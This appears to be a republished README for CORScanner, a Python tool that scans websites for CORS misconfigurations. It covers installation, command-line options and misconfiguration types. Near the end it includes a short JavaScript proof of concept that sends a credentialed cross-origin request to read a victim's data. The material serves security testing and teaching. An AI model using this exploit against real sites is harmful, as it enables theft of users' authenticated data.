CORScanner Fast CORS Misconfiguration Vulnerabilities Scanner

CORScanner: Fast CORS Misconfiguration Vulnerabilities Scanner

CORScanner is a python tool designed to discover CORS misconfigurations vulnerabilities of websites. It helps website administrators and penetration testers to check whether the domains/urls they are targeting have insecure CORS policies.


  • Fast. It uses gevent instead of Python threads for concurrency, which is much faster for network scanning.
  • Comprehensive. It covers all the common types of CORS misconfigurations we know.
  • Flexible. It supports various self-define features (e.g. file output), which is helpful for large-scale scanning.
  • 🆕 CORScanner supports installation via pip (pip install corscanner or pip install cors)
  • 🆕 CORScanner can be used as a library in your project.

Latex version:

author = {Jianjun Chen and Jian Jiang and Haixin Duan and Tao Wan and Shuo Chen and Vern Paxson and Min Yang},
title = {We Still Don{\textquoteright}t Have Secure Cross-Domain Requests: an Empirical Study of {CORS}},
booktitle = {27th {USENIX} Security Symposium ({USENIX} Security 18)},
year = {2018},
isbn = {978-1-939133-04-5},
address = {Baltimore, MD},
pages = {1079--1093},
url = {},
publisher = {{USENIX} Association},
month = aug,

Word version:

Jianjun Chen, Jian Jiang, Haixin Duan, Tao Wan, Shuo Chen, Vern Paxson, and Min Yang. “We Still Don’t Have Secure Cross-Domain Requests: an Empirical Study of CORS.” In 27th USENIX Security Symposium (USENIX Security 18), pp. 1079-1093. 2018.


Screenshot of CORScanner
Screenshot of CORScanner


  • Download this tool
git clone
  • Install dependencies
sudo pip install -r requirements.txt

CORScanner depends on the requestsgeventtldextractcolorama and argparse python modules.

Python Version

  • Both Python 2 (2.7.x) and Python 3 (3.7.x) are supported.

CORScanner as a library

  • Install CORScanner via pip
sudo pip install corscanner

or use the short name:

sudo pip install cors
  • Example code:
>>> from CORScanner.cors_scan import cors_check
>>> ret = cors_check("", None)
>>> ret
{'url': '', 'type': 'reflect_origin', 'credentials': 'false', 'origin': '', 'status_code': 200}

You can also use CORScanner via the corscanner or cors command:

cors -vu


Short FormLong FormDescription
-u–urlURL/domain to check it’s CORS policy
-d–headersAdd headers to the request
-i–inputURL/domain list file to check their CORS policy
-t–threadsNumber of threads to use for CORS scan
-o–outputSave the results to json file
-v–verboseEnable the verbose mode and display results in realtime
-T–timeoutSet requests timeout (default 10 sec)
-p–proxyEnable proxy (http or socks5)
-h–helpshow the help message and exit


  • To check CORS misconfigurations of specific domain:
python -u
  • To enable more debug info, use -v:
python -u -v
  • To save scan results to a JSON file, use -o:
python -u -o output_filename
  • To check CORS misconfigurations of specific URL:
python -u
  • To check CORS misconfiguration with specific headers:
python -u -d "Cookie: test"
  • To check CORS misconfigurations of multiple domains/URLs:
python -i top_100_domains.txt -t 100
  • To enable proxy for CORScanner, use -p
python -u -p
  • To use socks5 proxy, install PySocks with pip install PySocks
python -u -p socks5://
  • To list all the basic options and switches use -h switch:
python -h

Misconfiguration types

This tool covers the following misconfiguration types:

Misconfiguration typeDescription
Reflect_any_originBlindly reflect the Origin header value in Access-Control-Allow-Origin headers in responses, which means any website can read its secrets by sending cross-orign requests. trusts, which is an attacker’s domain. trusts, which could be registered by an attacker. trusts, which could be registered by an attacker.
Substring trusts, which could be registered by an attacker. trusts null, which can be forged by iframe sandbox scripts
HTTPS_trust_HTTPRisky trust dependency, a MITM attacker may steal HTTPS site secrets
Trust_any_subdomainRisky trust dependency, a subdomain XSS may steal its secrets
Custom_third_partiesCustom unsafe third parties origins like, see more in origins.json file. Thanks @phackt!
Special_characters_bypassExploiting browsers’ handling of special characters. Most can only work in Safari except _, which can also work in Chrome and Firefox. See more in Advanced CORS Exploitation Techniques. Thanks @Malayke.

Exploitation examples

Here is an example about how to exploit “Reflect_any_origin” misconfiguration on Localhost is the malicious website in the video. video on Youtube:

Here is the exploitation code:

    // Send a cross origin request to the server, when a victim visits the page.
    var req = new XMLHttpRequest();'GET',"",true);
    req.onload = stealData;
    req.withCredentials = true;

    function stealData(){
        //reading response is allowed because of the CORS misconfiguration.
        var data= JSON.stringify(JSON.parse(this.responseText),null,2);

        //display the data on the page. A real attacker can send the data to his server.

    function output(inp) {
        document.body.appendChild(document.createElement('pre')).innerHTML = inp;

If you have understood how the demo works, you can read Section 5 and Section 6 of the CORS paper and know how to exploit other misconfigurations.

More Stories
SMS-Xombie Android Spyware Remote C&C Server
SMS-Xombie: Android Spyware with a Remote C&C Server